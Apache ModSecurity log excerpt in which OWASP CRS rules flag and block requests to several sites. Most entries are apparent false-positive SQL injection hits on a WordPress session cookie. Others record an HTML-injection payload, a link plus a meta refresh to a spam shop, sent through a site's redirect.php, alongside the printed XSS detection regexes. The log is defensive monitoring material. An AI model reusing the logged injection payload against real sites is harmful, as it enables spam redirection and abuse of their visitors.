[Mon May 11 22:23:23.312846 2026] [security2:error] [pid 1606352:tid 1606422] [client 27.78.84.116:51742] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 25 - SQLI=0,XSS=20,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=5,SESS=0): IE XSS Filters - Attack Detected."] [tag "event-correlation"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agI6u3o_DFxNSZVmaX3OuwAAAMM"]
[Mon May 11 22:23:23.544033 2026] [security2:error] [pid 1606352:tid 1606436] [client 103.59.161.151:61367] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: cd9c493f65d761cdf723586a1820a2c1||1778532584||1778532224"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/plugins.php"] [unique_id "agI6u3o_DFxNSZVmaX3OvAAAANE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:23:23.544371 2026] [security2:error] [pid 1606352:tid 1606436] [client 103.59.161.151:61367] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/plugins.php"] [unique_id "agI6u3o_DFxNSZVmaX3OvAAAANE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:23:24.128011 2026] [security2:error] [pid 1606352:tid 1606436] [client 103.59.161.151:61367] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agI6u3o_DFxNSZVmaX3OvAAAANE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:23:24.851269 2026] [security2:error] [pid 1606352:tid 1606436] [client 103.59.161.151:61367] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: cd9c493f65d761cdf723586a1820a2c1||1778532584||1778532224"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-login.php"] [unique_id "agI6vHo_DFxNSZVmaX3OvQAAANE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:23:24.851556 2026] [security2:error] [pid 1606352:tid 1606436] [client 103.59.161.151:61367] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-login.php"] [unique_id "agI6vHo_DFxNSZVmaX3OvQAAANE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:23:25.370324 2026] [security2:error] [pid 1588898:tid 1588906] [client 43.130.57.76:57092] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.la-grande-fabrique.com"] [uri "/"] [unique_id "agI6vaFW67LJTsgN3jQLTwAAAAc"]
[Mon May 11 22:23:25.394043 2026] [security2:error] [pid 1606352:tid 1606436] [client 103.59.161.151:61367] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agI6vHo_DFxNSZVmaX3OvQAAANE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:23:25.930375 2026] [security2:error] [pid 1606352:tid 1606436] [client 103.59.161.151:61367] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: cd9c493f65d761cdf723586a1820a2c1||1778532584||1778532224"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/index.php"] [unique_id "agI6vXo_DFxNSZVmaX3OwAAAANE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:23:25.930663 2026] [security2:error] [pid 1606352:tid 1606436] [client 103.59.161.151:61367] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/index.php"] [unique_id "agI6vXo_DFxNSZVmaX3OwAAAANE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:23:26.508212 2026] [security2:error] [pid 1606352:tid 1606436] [client 103.59.161.151:61367] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agI6vXo_DFxNSZVmaX3OwAAAANE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:23:26.736709 2026] [security2:error] [pid 1606352:tid 1606436] [client 103.59.161.151:61367] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: cd9c493f65d761cdf723586a1820a2c1||1778532584||1778532224"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/"] [unique_id "agI6vno_DFxNSZVmaX3OyQAAANE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:23:26.737006 2026] [security2:error] [pid 1606352:tid 1606436] [client 103.59.161.151:61367] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/"] [unique_id "agI6vno_DFxNSZVmaX3OyQAAANE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:23:27.183044 2026] [security2:error] [pid 1606352:tid 1606436] [client 103.59.161.151:61367] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agI6vno_DFxNSZVmaX3OyQAAANE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:23:27.230925 2026] [security2:error] [pid 1588898:tid 1590048] [client 27.78.84.116:52158] ModSecurity: Warning. Pattern match "(?:\\\\bhttp\\\\/(?:0\\\\.9|1\\\\.[01])|<(?:html|meta)\\\\b)" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-921-PROTOCOL-ATTACK.conf"] [line "65"] [id "921130"] [rev "2"] [msg "HTTP Response Splitting Attack"] [data "Matched Data: <meta found within ARGS:url: http://www.kepenk\\xc2\\xa0trsfcdhf.hfhjf.hdasgsdfhdshshfsh@forum.annecy-outdoor.com/suivi_forum/?a[]=<a href=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/>youthful evening dress styles</a><meta http-equiv=refresh content=0;url=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/ />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agI6v6FW67LJTsgN3jQLWAAAAAE"]
[Mon May 11 22:23:27.231382 2026] [security2:error] [pid 1588898:tid 1590048] [client 27.78.84.116:52158] ModSecurity: Warning. detected XSS using libinjection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "37"] [id "941100"] [rev "2"] [msg "XSS Attack Detected via libinjection"] [data "Matched Data: http://www.kepenk\\xc2\\xa0trsfcdhf.hfhjf.hdasgsdfhdshshfsh@forum.annecy-outdoor.com/suivi_forum/?a[]=<a href=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/>Youthful evening dress styles</a><meta http-equiv=refresh content=0;url=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/ /> found within ARGS:url: http://www.kepenk\\xc2\\xa0trsfcdhf.hfhjf.hdasgsdfhdshshfsh@forum.annecy-outdoor.com/suivi_forum/?a[]=<a href=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/>Youthful evening dress styles</..."] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A3"] [tag  [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agI6v6FW67LJTsgN3jQLWAAAAAE"]
[Mon May 11 22:23:27.231544 2026] [security2:error] [pid 1588898:tid 1590048] [client 27.78.84.116:52158] ModSecurity: Warning. Pattern match "(?i)(?:<(?:(?:apple|objec)t|isindex|embed|style|form|meta)\\\\b[^>]*?>[\\\\s\\\\S]*?|(?:=|U\\\\s*?R\\\\s*?L\\\\s*?\\\\()\\\\s*?[^>]*?\\\\s*?S\\\\s*?C\\\\s*?R\\\\s*?I\\\\s*?P\\\\s*?T\\\\s*?:)" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "65"] [id "941140"] [rev "3"] [msg "XSS Filter - Category 4: Javascript URI Vector"] [data "Matched Data: <meta http-equiv=refresh content=0;url=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/ /> found within ARGS:url: http://www.kepenk\\xc2\\xa0trsfcdhf.hfhjf.hdasgsdfhdshshfsh@forum.annecy-outdoor.com/suivi_forum/?a[]=<a href=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/>Youthful evening dress styles</a><meta http-equiv=refresh content=0;url=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/ />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WA [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agI6v6FW67LJTsgN3jQLWAAAAAE"]
[Mon May 11 22:23:27.231648 2026] [security2:error] [pid 1588898:tid 1590048] [client 27.78.84.116:52158] ModSecurity: Warning. Pattern match "(?i)<[^\\\\w<>]*(?:[^<>\\"'\\\\s]*:)?[^\\\\w<>]*(?:\\\\W*?s\\\\W*?c\\\\W*?r\\\\W*?i\\\\W*?p\\\\W*?t|\\\\W*?f\\\\W*?o\\\\W*?r\\\\W*?m|\\\\W*?s\\\\W*?t\\\\W*?y\\\\W*?l\\\\W*?e|\\\\W*?s\\\\W*?v\\\\W*?g|\\\\W*?m\\\\W*?a\\\\W*?r\\\\W*?q\\\\W*?u\\\\W*?e\\\\W*?e|(?:\\\\W*?l\\\\W*?i\\\\W*?n\\\\W*?k|\\\\W*?o\\\\W*?b\\\\W*?j\\\\W*?e\\ ..." at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "74"] [id "941160"] [rev "2"] [msg "NoScript XSS InjectionChecker: HTML Injection"] [data "Matched Data: <meta  found within ARGS:url: http://www.kepenk\\xc2\\xa0trsfcdhf.hfhjf.hdasgsdfhdshshfsh@forum.annecy-outdoor.com/suivi_forum/?a[]=<a href=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/>Youthful evening dress styles</a><meta http-equiv=refresh content=0;url=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/ />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS" [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agI6v6FW67LJTsgN3jQLWAAAAAE"]
[Mon May 11 22:23:27.231828 2026] [security2:error] [pid 1588898:tid 1590048] [client 27.78.84.116:52158] ModSecurity: Warning. Pattern match "(?i:<META[\\\\s/+].*?http-equiv[\\\\s/+]*=[\\\\s/+]*[\\"\\\\'`]?(((c|(&#x?0*((67)|(43)|(99)|(63));?)))|((r|(&#x?0*((82)|(52)|(114)|(72));?)))|((s|(&#x?0*((83)|(53)|(115)|(73));?)))))" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "113"] [id "941250"] [rev "3"] [msg "IE XSS Filters - Attack Detected."] [data "Matched Data: <meta http-equiv=r found within ARGS:url: http://www.kepenk\\xc2\\xa0trsfcdhf.hfhjf.hdasgsdfhdshshfsh@forum.annecy-outdoor.com/suivi_forum/?a[]=<a href=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/>Youthful evening dress styles</a><meta http-equiv=refresh content=0;url=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/ />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "8"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A3"] [tag "OWASP [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agI6v6FW67LJTsgN3jQLWAAAAAE"]
[Mon May 11 22:23:27.232264 2026] [security2:error] [pid 1588898:tid 1590048] [client 27.78.84.116:52158] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 25)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agI6v6FW67LJTsgN3jQLWAAAAAE"]
[Mon May 11 22:23:27.232533 2026] [security2:error] [pid 1588898:tid 1590048] [client 27.78.84.116:52158] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 25 - SQLI=0,XSS=20,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=5,SESS=0): IE XSS Filters - Attack Detected."] [tag "event-correlation"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agI6v6FW67LJTsgN3jQLWAAAAAE"]
[Mon May 11 22:23:28.346123 2026] [security2:error] [pid 1606352:tid 1606436] [client 103.59.161.151:61367] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: cd9c493f65d761cdf723586a1820a2c1||1778532584||1778532224"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/profile.php"] [unique_id "agI6wHo_DFxNSZVmaX3OywAAANE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:23:28.346419 2026] [security2:error] [pid 1606352:tid 1606436] [client 103.59.161.151:61367] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/profile.php"] [unique_id "agI6wHo_DFxNSZVmaX3OywAAANE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:23:28.951210 2026] [security2:error] [pid 1606352:tid 1606436] [client 103.59.161.151:61367] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agI6wHo_DFxNSZVmaX3OywAAANE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:23:29.878089 2026] [security2:error] [pid 1590352:tid 1590401] [client 27.78.84.116:52499] ModSecurity: Warning. Pattern match "(?:\\\\bhttp\\\\/(?:0\\\\.9|1\\\\.[01])|<(?:html|meta)\\\\b)" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-921-PROTOCOL-ATTACK.conf"] [line "65"] [id "921130"] [rev "2"] [msg "HTTP Response Splitting Attack"] [data "Matched Data: <meta found within ARGS:url: http://www.kepenk\\xc2\\xa0trsfcdhf.hfhjf.hdasgsdfhdshshfsh@forum.annecy-outdoor.com/suivi_forum/?a[]=<a href=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/>youthful evening dress styles</a><meta http-equiv=refresh content=0;url=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/ />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agI6wa1q0G_aXAqWauT6MQAAAIk"]
[Mon May 11 22:23:29.880261 2026] [security2:error] [pid 1590352:tid 1590401] [client 27.78.84.116:52499] ModSecurity: Warning. detected XSS using libinjection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "37"] [id "941100"] [rev "2"] [msg "XSS Attack Detected via libinjection"] [data "Matched Data: http://www.kepenk\\xc2\\xa0trsfcdhf.hfhjf.hdasgsdfhdshshfsh@forum.annecy-outdoor.com/suivi_forum/?a[]=<a href=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/>Youthful evening dress styles</a><meta http-equiv=refresh content=0;url=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/ /> found within ARGS:url: http://www.kepenk\\xc2\\xa0trsfcdhf.hfhjf.hdasgsdfhdshshfsh@forum.annecy-outdoor.com/suivi_forum/?a[]=<a href=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/>Youthful evening dress styles</..."] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A3"] [tag  [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agI6wa1q0G_aXAqWauT6MQAAAIk"]
[Mon May 11 22:23:29.887879 2026] [security2:error] [pid 1590352:tid 1590401] [client 27.78.84.116:52499] ModSecurity: Warning. Pattern match "(?i)(?:<(?:(?:apple|objec)t|isindex|embed|style|form|meta)\\\\b[^>]*?>[\\\\s\\\\S]*?|(?:=|U\\\\s*?R\\\\s*?L\\\\s*?\\\\()\\\\s*?[^>]*?\\\\s*?S\\\\s*?C\\\\s*?R\\\\s*?I\\\\s*?P\\\\s*?T\\\\s*?:)" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "65"] [id "941140"] [rev "3"] [msg "XSS Filter - Category 4: Javascript URI Vector"] [data "Matched Data: <meta http-equiv=refresh content=0;url=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/ /> found within ARGS:url: http://www.kepenk\\xc2\\xa0trsfcdhf.hfhjf.hdasgsdfhdshshfsh@forum.annecy-outdoor.com/suivi_forum/?a[]=<a href=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/>Youthful evening dress styles</a><meta http-equiv=refresh content=0;url=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/ />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WA [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agI6wa1q0G_aXAqWauT6MQAAAIk"]
[Mon May 11 22:23:29.887996 2026] [security2:error] [pid 1590352:tid 1590401] [client 27.78.84.116:52499] ModSecurity: Warning. Pattern match "(?i)<[^\\\\w<>]*(?:[^<>\\"'\\\\s]*:)?[^\\\\w<>]*(?:\\\\W*?s\\\\W*?c\\\\W*?r\\\\W*?i\\\\W*?p\\\\W*?t|\\\\W*?f\\\\W*?o\\\\W*?r\\\\W*?m|\\\\W*?s\\\\W*?t\\\\W*?y\\\\W*?l\\\\W*?e|\\\\W*?s\\\\W*?v\\\\W*?g|\\\\W*?m\\\\W*?a\\\\W*?r\\\\W*?q\\\\W*?u\\\\W*?e\\\\W*?e|(?:\\\\W*?l\\\\W*?i\\\\W*?n\\\\W*?k|\\\\W*?o\\\\W*?b\\\\W*?j\\\\W*?e\\ ..." at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "74"] [id "941160"] [rev "2"] [msg "NoScript XSS InjectionChecker: HTML Injection"] [data "Matched Data: <meta  found within ARGS:url: http://www.kepenk\\xc2\\xa0trsfcdhf.hfhjf.hdasgsdfhdshshfsh@forum.annecy-outdoor.com/suivi_forum/?a[]=<a href=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/>Youthful evening dress styles</a><meta http-equiv=refresh content=0;url=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/ />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS" [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agI6wa1q0G_aXAqWauT6MQAAAIk"]
[Mon May 11 22:23:29.888186 2026] [security2:error] [pid 1590352:tid 1590401] [client 27.78.84.116:52499] ModSecurity: Warning. Pattern match "(?i:<META[\\\\s/+].*?http-equiv[\\\\s/+]*=[\\\\s/+]*[\\"\\\\'`]?(((c|(&#x?0*((67)|(43)|(99)|(63));?)))|((r|(&#x?0*((82)|(52)|(114)|(72));?)))|((s|(&#x?0*((83)|(53)|(115)|(73));?)))))" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "113"] [id "941250"] [rev "3"] [msg "IE XSS Filters - Attack Detected."] [data "Matched Data: <meta http-equiv=r found within ARGS:url: http://www.kepenk\\xc2\\xa0trsfcdhf.hfhjf.hdasgsdfhdshshfsh@forum.annecy-outdoor.com/suivi_forum/?a[]=<a href=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/>Youthful evening dress styles</a><meta http-equiv=refresh content=0;url=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/ 